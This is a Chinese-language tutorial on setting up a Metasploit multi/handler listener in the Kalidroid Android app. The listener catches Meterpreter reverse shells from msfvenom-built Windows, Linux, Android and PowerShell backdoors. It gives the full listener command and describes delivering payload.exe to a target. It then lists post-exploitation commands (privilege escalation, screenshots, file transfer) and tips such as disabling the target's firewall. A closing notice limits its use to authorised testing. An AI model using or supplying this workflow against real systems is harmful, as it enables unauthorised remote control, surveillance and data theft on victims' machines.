Kalidroid Handler 独立监听模块完整实战教程|等待 Meterpreter 反弹会话专用

Kalidroid Handler 独立监听模块完整实战教程|等待 Meterpreter 反弹会话专用

前言

在 msfvenom 生成后门木马后,必须开启监听端口才能捕获目标主机反弹回来的 Meterpreter 控制会话。Kalidroid 将 Metasploit 的 multi/handler 独立封装为Handler 图形化模块,轻量化后台监听,无需完整加载 msfconsole 控制台,占用手机资源更低,专门配合自制 exe/elf/apk 后门使用。

 

本文基于  (华为p90 ,Kalidroid v1.3.29-debug)全套实操截图,完整讲解 Handler 监听配置、参数含义、后台持久监听全流程,操作仅限拥有书面合法授权的测试环境。

一、Handler 模块入口与功能定位

1. 进入模块

打开 Kalidroid 主界面→Metasploit 功能页,在 MODE 分区选择红色高亮的 Handler 模式,页面标注状态Ready to listen,代表监听功能就绪。

20260719072546738-ec159baec0641b4cc7c6cad9a08fa28e

四种运行模式区分:

模式 核心用途 使用场景
msfconsole 完整交互式控制台,漏洞攻击 + 监听一体 漏洞模块直接利用场景
msfvenom 生成各类系统反弹后门载荷 制作 exe/elf/apk 木马
Handler 独立轻量化端口监听程序(本文核心) 配合 msfvenom 生成的木马,单独等待反弹会话
msfrpcd MSF 远程 RPC 接口服务 自动化脚本、第三方工具联动
模块简介:Start a multi/handler listener — quickest way to catch a callback.

 

翻译:启动多架构通用监听器,捕获目标回连会话最高效的方式。


二、全界面参数详细解析

1. 有效载荷(Payload)选择区

软件内置全平台反弹载荷,必须和 msfvenom 生成木马时选用的载荷完全一致,否则无法捕获会话:
  1. Windows 系列(本次实操选用)
    • meterpreter (win x64):64 位 Windows 系统交互式 shell,对应 exe 木马
    • meterpreter (win x86):32 位老旧 Windows 系统
    • shell (win x64):极简 cmd 反弹,无 meterpreter 高级功能
  2. Linux 系列
    • meterpreter (linux x64/arm64):服务器、ARM 设备 elf 后门配套监听
  3. Android 系列
    • meterpreter (android):APK 安卓木马专用载荷
  4. 脚本类载荷
     

    python/php reverse_tcp、powershell 无文件脚本载荷

本次实操选中meterpreter (win x64),自动填充载荷字符串:

 

windows/x64/meterpreter/reverse_tcp

2. 监听器核心配置(LHOST / LPORT)
这是监听成功的核心参数,必须与生成木马时填写数值完全匹配:
  • LHOST:手机局域网回连 IP,示例192.168.10.6
     

    内网测试填写本机 WiFi 局域网 IP;外网公网测试填写公网 IP,路由器做好端口转发。

  • LPORT:监听端口,标准通用 4444,可自定义 5000、8080 等未被占用端口。
     

    💡界面提示解读:

LHOST 是目标回连地址;虚拟机内部 SLARP 网关 IP 为 10.0.2.15,若开启端口转发,则填写手机局域网 IP。

20260719073236416-fe5f27ec67c34076cd28c413d6216015

3. 自定义高级稳定参数

AutoRunScript=multi_console_command · ExitOnSession=false
参数作用拆解:
  1. ExitOnSession=false:一条会话断开后,监听不会终止,持续等待新的设备反弹上线(多台设备批量渗透必备)
  2. AutoRunScript=multi_console_command:会话成功上线后,自动预设执行脚本,省去手动输入命令操作

4. 全局运行设置开关

  1. 自动初始化 msfdb:开启后会话、主机信息存入 MSF 数据库,支持后续资产查看;仅单纯监听可关闭节省内存
  2. 安静横幅(-q):跳过 MSF 启动大段 ASCII 艺术字符,加快监听启动速度
  3. ANSI 颜色:开启终端彩色日志,区分会话上线绿色提示、报错红色日志

5. 命令预览与启动按钮

页面自动拼接完整可执行监听命令,支持一键复制;

 

确认所有参数无误后,点击底部蓝色按钮 Start Handler 启动后台监听。

自动生成完整命令示例:
kalidroid-msfdb; msfconsole -q -x 'workspace default; use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST 192.168.10.6; set LPORT 4444; set ExitOnSession false; run'

20260719072819899-81db70fad5e8c10b09eeb7052fa42ef0

三、完整配套渗透操作流程(结合 msfvenom)

步骤 1:msfvenom 生成对应载荷木马
  1. Metasploit 切换 msfvenom 模式,选择windows/x64/meterpreter/reverse_tcp
  2. LHOST 填手机局域网 IP192.168.10.6,LPORT=4444,输出格式 exe
  3. 一键生成payload.exe后门程序,通过 Python HTTP 服务分发至目标 Windows 设备

步骤 2:切换 Handler 模块配置监听

  1. MODE 切换为 Handler,载荷选择与木马一致的meterpreter (win x64)
  2. LHOST、LPORT 和生成木马时保持完全相同
  3. 自定义参数添加ExitOnSession=false,开启持久监听
  4. 点击Start Handler,后台开启 4444 端口等待回连

步骤 3:目标运行木马,捕获 Meterpreter 会话

  1. Windows 设备双击运行payload.exe
  2. 目标主动向手机 192.168.10.6:4444 发起 TCP 连接
  3. Handler 监听器捕获会话,自动进入 Meterpreter 交互终端,可执行:
    • sysinfo:查询目标系统版本、硬件架构
    • getsystem:提升至 Windows 系统最高管理员权限
    • screenshot:截取目标电脑实时桌面
    • upload/download:双向传输本地文件与目标主机文件

四、多场景载荷监听配置方案

场景 1:Windows exe 后门监听(本文案例)
  • 载荷:windows/x64/meterpreter/reverse_tcp
  • LPORT:4444
  • 自定义参数:ExitOnSession=false(持续监听多台设备)

场景 2:Linux 服务器 elf 后门监听

  • 载荷:linux/x64/meterpreter/reverse_tcp
  • LPORT:5555
  • 输出匹配 msfvenom 生成的 elf 文件

场景 3:Android APK 木马监听

  • 载荷:android/meterpreter/reverse_tcp
  • LPORT:8080
  • 适合移动端测试设备反弹控制

场景 4:Powershell 无内存文件后门监听

  • 载荷:windows/x64/powershell/reverse_tcp
  • 无需生成 exe 文件,复制脚本直接在 Windows 终端执行

五、常见故障排查指南

故障现象 故障根源 解决办法
运行木马无任何会话上线 1.LHOST/LPORT 参数和木马不一致;2. 监听未提前启动;3. 目标防火墙拦截出站 4444 端口 核对两边 IP、端口完全一致;先启动 Handler 再运行木马;关闭目标防火墙放行 4444 端口
单台设备下线后监听直接关闭 未添加ExitOnSession=false参数 在自定义参数框填入该配置,开启持久监听
监听启动卡顿闪退 手机内存不足,自动初始化 msfdb 占用资源 关闭「自动初始化 msfdb」开关,无数据库模式启动
提示载荷不匹配无法捕获会话 Handler 与 msfvenom 选用的 payload 架构不一致 两边统一 win x64/win x86/linux 等对应载荷
外网公网环境木马连不上监听 未做路由器端口转发;LHOST 填写内网 IP 而非公网 IP 路由器转发 LPORT 端口;LHOST 填写宽带公网 IP

六、合规安全警示 ⚠️

  1. 严禁对无书面授权的电脑、服务器、智能设备生成后门、开启监听、获取控制会话,私自监听、入侵第三方设备违反《网络安全法》《刑法》,需承担民事、刑事责任。
  2. 测试完成后,必须点击关闭 Handler 监听,删除所有生成的后门程序,清空终端会话日志,消除测试痕迹。
  3. 本教程仅用于企业内部安全自查、授权漏洞演练、网络安全专业学习,禁止用于窃取数据、破坏系统、牟利等恶意用途。

教程总结

  1. Handler 是 Kalidroid 独立轻量化监听模块,专门配合 msfvenom 自制后门使用,比完整 msfconsole 占用资源更少;
  2. 监听成功核心三要素:载荷完全匹配、LHOST/LPORT 和木马参数一致、提前启动监听;
  3. 添加ExitOnSession=false可实现多设备持久监听,批量捕获内网反弹会话;
  4. 完整渗透链路:Nmap 扫描存活主机 → msfvenom 生成对应系统后门 → Handler 开启端口监听 → 目标运行木马获取 Meterpreter 控制会话。

系列教程回顾

© 版权声明
THE END
喜欢就支持一下吧
点赞5赞赏 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容